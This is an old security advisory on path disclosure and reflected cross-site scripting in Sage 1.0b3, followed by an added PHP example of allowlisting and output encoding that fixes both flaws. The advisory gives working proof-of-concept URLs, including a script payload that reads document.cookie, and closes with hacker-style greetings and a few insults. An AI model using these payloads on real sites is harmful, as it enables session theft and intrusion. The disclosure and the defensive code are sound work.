=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in Sage
product: Sage 1.0b3
vendor: http://sage.dev.box.sk/
risk: middle
date: 02/20/2k3
discovered by: euronymous /f0kp /r00tc0de
advisory urls: http://f0kp.iplus.ru/bz/015.en.txt
               http://f0kp.iplus.ru/bz/015.ru.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

1) path disclosure

you can view the full system path in two ways:

http://hostname/?mod=some_thing&op=browse

where `some_thing' is a nonexistent module name

===================================================
Fatal error: Cannot instantiate non-existent class:
module_some_thing in /home/aztek/libraries/module.inc.php
on line 62
===================================================

the other method is:

http://hostname/?mod=node&nid=some_thing&op=view

===================================================
Access Denied
/home/aztek/modules/node.module.php:71
===================================================

2) cross-site scripting

because $mod is not checked correctly, you can insert html,
javascript, etc. into the script output:

http://hostname/?mod=<script>alert(document.cookie)</script>&op=browse

shouts: r00tc0de.net, DWC, DHG, security.nnov.ru, all russian
security guyz!! and kate for being a kewl girl ))

fsck_off: slavomira and other dirty ppl in *.kz

================
im not a lame, not yet a hacker
================
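One way to handle the mod parameter so that neither issue occurs, as an added example that is not part of the original advisory and is not Sage's own code: the dispatcher, the KNOWN_MODULES allowlist and the helper names are hypothetical. It checks mod against an allowlist before any class name is derived from it, HTML-encodes anything echoed back, and keeps file paths and line numbers in the server log instead of the response.

```php
<?php
// Added example: hypothetical dispatcher, not Sage's actual source.
// Constructed allowlist; a real application would derive it from the
// modules it actually ships.
const KNOWN_MODULES = ['node', 'user', 'forum'];

// Keep interpreter errors ("Cannot instantiate non-existent class ... in
// /home/...") out of the response body; they go to the error log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Return the module name if it is well-formed and allowlisted, else null. */
function resolve_module($raw): ?string
{
    if (!is_string($raw) || !preg_match('/\A[a-z0-9_]{1,32}\z/', $raw)) {
        return null;
    }
    return in_array($raw, KNOWN_MODULES, true) ? $raw : null;
}

/** Encode untrusted text for an HTML body context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the response for one request as [status code, body]. */
function dispatch(array $query): array
{
    $raw = $query['mod'] ?? '';
    $mod = resolve_module($raw);
    if ($mod === null) {
        // Detail stays server-side; the client gets a generic message with
        // no file name or line number, and the echoed value is encoded.
        error_log('rejected mod parameter: ' . var_export($raw, true));
        $shown = is_string($raw) ? h(substr($raw, 0, 32)) : '';
        return [404, "<p>Unknown module: {$shown}</p>"];
    }
    // Only an allowlisted value is ever used to build a class name.
    return [200, '<p>Module ' . h($mod) . ' loaded</p>'];
}

// Constructed sample requests using the URL shapes from the advisory.
foreach ([['mod' => 'some_thing', 'op' => 'browse'],
          ['mod' => '<script>alert(document.cookie)</script>', 'op' => 'browse'],
          ['mod' => 'node', 'op' => 'browse']] as $q) {
    [$status, $body] = dispatch($q);
    echo $status, ' ', $body, PHP_EOL;
}
```

The same pattern applies to the nid case in item 1: the "Access Denied" message should be generic, with the file and line written only to the log.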